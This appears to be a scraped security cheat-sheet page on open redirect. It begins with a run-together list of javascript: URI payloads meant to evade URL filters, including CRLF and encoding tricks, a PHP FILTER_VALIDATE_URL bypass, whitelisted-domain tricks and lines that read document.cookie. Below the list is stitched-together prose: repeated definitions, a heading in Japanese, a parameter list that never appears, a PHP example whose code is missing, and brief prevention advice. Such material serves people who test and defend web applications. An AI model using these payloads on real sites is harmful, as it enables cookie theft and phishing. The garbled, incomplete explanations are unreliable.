#Basic payload, javascript code is executed after "javascript:"javascript:alert(1)#Bypass "javascript" word filter with CRLFjava%0d%0ascript%0d%0a:alert(0)#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL os PHPjavascript://%250Aalert(1)#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)javascript://%250Aalert(1)//?1javascript://%250A1?alert(1):0#Others%09Jav%09ascript:alert(document.domain)javascript://%250Alert(document.location=document.cookie)/%09/javascript:alert(1);/%09/javascript:alert(1)//%5cjavascript:alert(1);//%5cjavascript:alert(1)/%5cjavascript:alert(1);/%5cjavascript:alert(1)javascript://%0aalert(1)<>javascript:alert(1);//javascript:alert(1);//javascript:alert(1)/javascript:alert(1);/javascript:alert(1)\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)javascript:alert(1);javascript:alert(1)javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)javascript:confirm(1)javascript://https://whitelisted.com/?z=%0Aalert(1)javascript:prompt(1)jaVAscript://whitelisted.com//%0d%0aalert(1);//javascript://whitelisted.com?%a0alert%281%29/x:1/:///%01javascript:alert(document.cookie)/";alert(0);//
SVGファイルをアップロードするオープンリダイレクト
An open redirect vulnerability can be exploited when uploading SVG files. When an application allows users to upload files and does not properly validate the redirect URL, an attacker can upload a malicious SVG file containing a crafted URL that redirects users to a malicious website. This can be used in phishing attacks to trick users into visiting a fake website that appears legitimate.
An open redirect vulnerability exists when a web application allows users to navigate to an external URL of the attacker's choosing. This can be exploited by an attacker to trick users into visiting malicious websites while appearing to be on a trusted domain. To identify open redirect vulnerabilities, testers should look for the following parameters in URLs:
An open redirect vulnerability exists when a web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect. Attackers can abuse this vulnerability to trick users into visiting malicious sites by disguising the malicious URL as a trustworthy one.
In this example, the PHP script takes a URL from the url parameter in the query string and redirects the user to that URL using the header() function. An attacker can craft a malicious URL like http://example.com/redirect.php?url=http://malicioussite.com to redirect users to a malicious site.
Prevention
To prevent open redirect vulnerabilities, always validate and sanitize user input before using it in a redirect. Whitelist allowed domains or use a list of safe URLs to compare against. Additionally, avoid using user-controlled input directly in the redirect mechanism.